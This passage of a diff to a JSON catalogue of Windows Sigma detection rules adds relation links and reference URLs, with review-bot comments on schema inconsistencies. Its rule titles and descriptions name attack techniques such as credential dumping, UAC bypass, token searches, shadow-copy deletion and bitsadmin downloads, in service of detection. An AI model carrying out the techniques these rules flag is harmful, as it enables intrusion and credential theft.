+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b",
 "value": "Usage of Sysinternals Tools"
 },
@@ -32083,6 +40859,22 @@
 "attack.t1059.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967",
 "value": "Suspicious Schtasks Execution AppData Folder"
 },
@@ -32108,6 +40900,15 @@
 "attack.t1548.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881",
 "value": "UAC Bypass Using Disk Cleanup"
 },
@@ -32124,9 +40925,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
 "https://twitter.com/_felamos/status/1204705548668555264",
 "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml"
 ],
 "tags": [
@@ -32134,6 +40935,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3",
 "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN"
 },
@@ -32150,8 +40960,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"
 ],
 "tags": [
@@ -32186,6 +40996,15 @@
 "car.2013-05-002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc",
 "value": "MS Office Product Spawning Exe in User Dir"
 },
@@ -32214,6 +41033,15 @@
 "car.2013-08-001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189",
 "value": "Scheduled Task Creation"
 },
@@ -32255,8 +41083,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
 "https://sourceforge.net/projects/mouselock/",
+ "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml"
 ],
 "tags": [
@@ -32281,8 +41109,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.echotrail.io/insights/search/wusa.exe/",
 "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://www.echotrail.io/insights/search/wusa.exe/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml"
 ],
 "tags": [
@@ -32313,6 +41141,15 @@
 "attack.t1564.004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6",
 "value": "Cmd Stream Redirection"
 },
@@ -32337,6 +41174,15 @@
 "attack.t1528"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615",
 "value": "Suspicious Office Token Search Via CLI"
 },
@@ -32353,8 +41199,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/17",
 "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/17",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml"
 ],
 "tags": [
@@ -32362,6 +41208,15 @@
 "attack.t1048.003"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5",
 "value": "Suspicious WebDav Client Execution"
 },
@@ -32401,8 +41256,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://support.anydesk.com/Automatic_Deployment",
 "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20",
+ "https://support.anydesk.com/Automatic_Deployment",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml"
 ],
 "tags": [
@@ -32410,6 +41265,15 @@
 "attack.t1219"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9",
 "value": "AnyDesk Silent Installation"
 },
@@ -32426,8 +41290,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26",
 "https://twitter.com/subTee/status/1216465628946563073",
+ "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml"
 ],
 "tags": [
@@ -32462,6 +41326,22 @@
 "attack.t1021.006"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8",
 "value": "Remote PowerShell Session Host Process (WinRM)"
 },
@@ -32487,7 +41367,7 @@
 ]
 },
 "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed",
- "value": "DllRegisterServer Call From Non Rundll32"
+ "value": "Renamed Rundll32 Execution Via DllRegisterServer"
 },
 {
 "description": "Detects commands that temporarily turn off Volume Snapshots",
@@ -32534,6 +41414,15 @@
 "attack.t1127"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e",
 "value": "Use of Mftrace.exe"
 },
@@ -32558,6 +41447,15 @@
 "attack.t1202"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a",
 "value": "Suspicious Rundll32 Without Any CommandLine Params"
 },
@@ -32574,9 +41472,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/filip_dragovic/status/1590104354727436290",
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120",
 "https://twitter.com/filip_dragovic/status/1590052248260055041",
+ "https://twitter.com/filip_dragovic/status/1590104354727436290",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml"
 ],
 "tags": "No established tags"
@@ -32605,6 +41503,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "edadb1e5-5919-4e4c-8462-a9e643b02c4b",
 "value": "Process Dump via RdrLeakDiag.exe"
 },
@@ -32621,8 +41528,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
 "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/",
+ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
 "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml"
 ],
@@ -32631,6 +41538,15 @@
 "attack.resource_development"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "2d87d610-d760-45ee-a7e6-7a6f2a65de00",
 "value": "Mustang Panda Dropper"
 },
@@ -32657,6 +41573,15 @@
 "attack.t1003.001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42",
 "value": "DumpMinitool Usage"
 },
@@ -32682,6 +41607,15 @@
 "attack.t1059.006"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43",
 "value": "Suspicious File Characteristics Due to Missing Fields"
 },
@@ -32711,6 +41645,29 @@
 "attack.t1490"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052",
 "value": "Maze Ransomware"
 },
@@ -32751,10 +41708,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
 "https://www.activecyber.us/activelabs/windows-uac-bypass",
- "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
 "https://twitter.com/ReaQta/status/1222548288731217921",
+ "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"
 ],
 "tags": [
@@ -32763,6 +41720,15 @@
 "attack.t1548.002"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c",
 "value": "Bypass UAC via WSReset.exe"
 },
@@ -32780,8 +41746,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
- "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
 "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
+ "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml"
 ],
 "tags": [
@@ -32789,6 +41755,15 @@
 "attack.t1486"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "74db3488-fd28-480a-95aa-b7af626de068",
 "value": "LockerGoga Ransomware"
 },
@@ -32815,6 +41790,15 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "899133d5-4d7c-4a7f-94ee-27355c879d90",
 "value": "Python Inline Command Execution"
 },
@@ -32859,8 +41843,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna",
 "https://twitter.com/vysecurity/status/977198418354491392",
+ "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml"
 ],
 "tags": [
@@ -32869,6 +41853,15 @@
 "attack.t1027"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd",
 "value": "Ping Hex IP"
 },
@@ -32885,8 +41878,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
+ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml"
 ],
 "tags": [
@@ -32895,9 +41888,49 @@
 "attack.t1053.005"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936",
 "value": "Schtasks Creation Or Modification With SYSTEM Privileges"
 },
+ {
+ "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)",
+ "meta": {
+ "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community",
+ "creation_date": "2018/09/03",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_susp_powershell_base64_encoded_cmd.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_base64_encoded_cmd.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea",
+ "value": "Suspicious Encoded PowerShell Command Line"
+ },
 {
 "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.",
 "meta": {
@@ -32919,6 +41952,15 @@
 "attack.t1059"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89",
 "value": "Conhost Spawned By Suspicious Parent Process"
 },
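Review bot: The new Suspicious Encoded PowerShell Command Line entry stores a string sentinel in a field that is an array everywhere else, `"falsepositive": "No established falsepositives"`, whereas the Tracker.exe entry added earlier in this patch has `"falsepositive": ["Unknown"]`; a key whose type varies per entry forces every consumer to special-case it. Emit an empty array (`"falsepositive": []`) or omit the key when the source rule lists no false positives, and apply the same to `tags`, which the Sysmon exploitation entry earlier in this file stores as the string `"No established tags"`. The sentinel strings look generator-supplied rather than copied from the Sigma rule, so the fix presumably belongs in the converter.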
@@ -32947,6 +41989,22 @@
 "attack.g0001"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "f0b70adb-0075-43b0-9745-e82a1c608fcc",
 "value": "ZxShell Malware"
 },
@@ -32963,7 +42021,7 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/",
+ "Turla has used fsutil fsinfo drives to list connected drives.",
 "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml"
 ],
@@ -33020,6 +42078,15 @@
 "attack.t1218"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598",
 "value": "Lolbin Ssh.exe Use As Proxy"
 },
@@ -33036,8 +42103,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml",
 "https://twitter.com/pabraeken/status/993298228840992768",
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml"
 ],
 "tags": [
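Review bot: The changed ref in the fsutil drive enumeration entry is now a bare sentence, `"Turla has used fsutil fsinfo drives to list connected drives."`, sitting in a list whose other elements are URLs, and the technique link that made it a usable reference has been dropped. If the source rule lists the text and the URL as separate references, keep `"https://attack.mitre.org/techniques/T1120/"` as its own element; if the prose is meant to stay, `refs` is the wrong place for it and the entry's description is the better home.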
@@ -33047,6 +42114,22 @@
 "attack.t1127"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060",
 "value": "SQL Client Tools PowerShell Session Detection"
 },
@@ -33072,6 +42155,15 @@
 "attack.t1574"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "a2910908-e86f-4687-aeba-76a5f996e652",
 "value": "DLL Execution Via Register-cimprovider.exe"
 },
@@ -33096,6 +42188,15 @@
 "attack.t1564.004"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "45a594aa-1fbd-4972-a809-ff5a99dd81b8",
 "value": "Run PowerShell Script from ADS"
 },
@@ -33113,15 +42214,15 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/intelligence-insights-october-2021/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
 "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
- "https://github.com/Neo23x0/Raccine#the-process",
+ "https://blog.talosintelligence.com/2017/05/wannacry.html",
+ "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "https://blog.talosintelligence.com/2017/05/wannacry.html",
+ "https://github.com/Neo23x0/Raccine#the-process",
+ "https://redcanary.com/blog/intelligence-insights-october-2021/",
 "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
- "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_deletion.yml"
 ],
 "tags": [
@@ -33131,6 +42232,15 @@
 "attack.t1490"
 ]
 },
+ "related": [
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2",
 "value": "Shadow Copies Deletion Using Operating Systems Utilities"
 },
@@ -33147,9 +42257,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" ], "tags": [ @@ -33173,9 +42283,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", - "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" ], "tags": [ @@ -33186,6 +42296,22 @@ "attack.t1036.003" ] }, + "related": [ + { + "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "value": "Bitsadmin Download" }, @@ -33211,6 +42337,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", "value": "Data Compressed - rar.exe" }, 
@@ -33238,6 +42373,22 @@ "attack.t1134.003" ] }, + "related": [ + { + "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "value": "SharpImpersonation Execution" }, @@ -33286,6 +42437,15 @@ "attack.t1087.001" ] }, + "related": [ + { + "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" }, @@ -33310,6 +42470,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", "value": "Suspicious Compression Tool Parameters" }, 
@@ -33326,11 +42495,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://twitter.com/JohnLaTwC/status/1223292479270600706", "https://twitter.com/bohops/status/980659399495741441", + "https://twitter.com/JohnLaTwC/status/1223292479270600706", + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", + "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" ], "tags": [ @@ -33338,6 +42507,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", "value": "Suspicious Usage of the 